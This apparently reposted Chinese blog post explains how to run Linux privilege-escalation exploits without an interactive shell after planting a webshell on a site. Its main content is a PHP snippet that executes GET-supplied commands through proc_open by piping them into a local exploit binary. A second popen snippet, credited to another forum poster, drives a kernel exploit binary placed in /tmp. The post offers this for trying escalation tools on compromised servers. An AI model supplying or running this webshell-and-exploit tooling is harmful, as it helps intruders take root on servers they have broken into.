Linux下非交互式提权详解
来源:互联网 发布:网络门禁模块 编辑:程序博客网 时间:2024/06/05 10:36
前言
之前拿到某站的Webshell之后,在提权的时候发现网站不能反弹shell。而且,在渗透的时候经常遇到那种不能反弹shell的,你的提权工具拿上去之后因为没有交互式的环境,也不知道提权是否成功。因此,写了一个简单的工具。需要的朋友们可以参考学习。
方法如下
proce_open()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// path是提权工具的绝对路径,例如:/usr/local/htdocs/2.6.18
// cmd是你需要执行的命令,例如:whoami
if(isset($_GET['path']) && isset($_GET['cmd'])){
$path = $_GET['path'];
$cmd = $_GET['cmd'];
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open($path, $descriptorspec, $pipes);
if (is_resource($process)) {
fwrite($pipes[0],$cmd);
fclose($pipes[0]);
echo stream_get_contents($pipes[1]);
echo stream_get_contents($pipes[2]);
fclose($pipes[1]);
fclose($pipes[2]);
$return_value = proc_close($process);
}
}
代码很简单,不懂的可以看看PHP手册,popen()
在这里也可以实现相同的效果
另外,有了这个代码之后,我们以后提权是不是就可以直接把提权工具扔到服务器上面,然后PHP代码改一改,循环测试哪些提权工具是可用的了。
popen()
这是土司之前一个人发的,代码原封不动的放在了下面。稍微改一改就能达到上面一样的效果
1
2
3
4
$sucommand = "/tmp/2.6.18-2011";
$fp = popen($sucommand ,"w");
fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111");
pclose($fp);
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对脚本之家的支持。
原文链接:http://ecma.io/?p=611
阅读全文
0 0
- Linux下非交互式提权详解
- Linux下非交互式sshpass登录
- LINUX修改用户密码-交互式与非交互式
- Linux下使用SSH非交互式远程执行命令脚本
- Linux下使用SSH非交互式远程执行命令脚本
- Linux下使用SSH非交互式远程执行命令脚本
- 两种Linux下非交互式命令的实现
- Linux非交互式修改密码
- sed-非交互式流编辑器详解
- Linux下非交互式远程执行命令脚本(比ssh更好的方式)
- Linux 指令详解 vi 交互式文本编辑器
- Linux下socket阻塞、非阻塞详解
- Linux Shell Bash 交互与非交互式脚本
- linux 非交互式实现分区的几种方法
- expect 非交互式sftp
- mysql交互式连接&非交互式连接
- mysql交互式连接&非交互式连接
- linux下交互式任务的自动化实现(expect&Pexpect)
- 安卓·Butterknife使用
- 旋转数组
- 《JAVA编程思想》第一章总结
- 异常解决:util.NativeCodeLoader: Unable to load native-hadoop library for your platform
- 个人三观的东西(1)
- Linux下非交互式提权详解
- 树的创建与数据打印
- AngularJS 的Provider,Factory与Service实现依赖注入
- 内存对齐及位域
- Python——复制文件内容
- bash: 一键安装cuDnn
- 【设计模式】其他模式
- springmvc补充
- Intellij IDEA 中使用 MyBatis-generator 自动生成 MyBatis 代码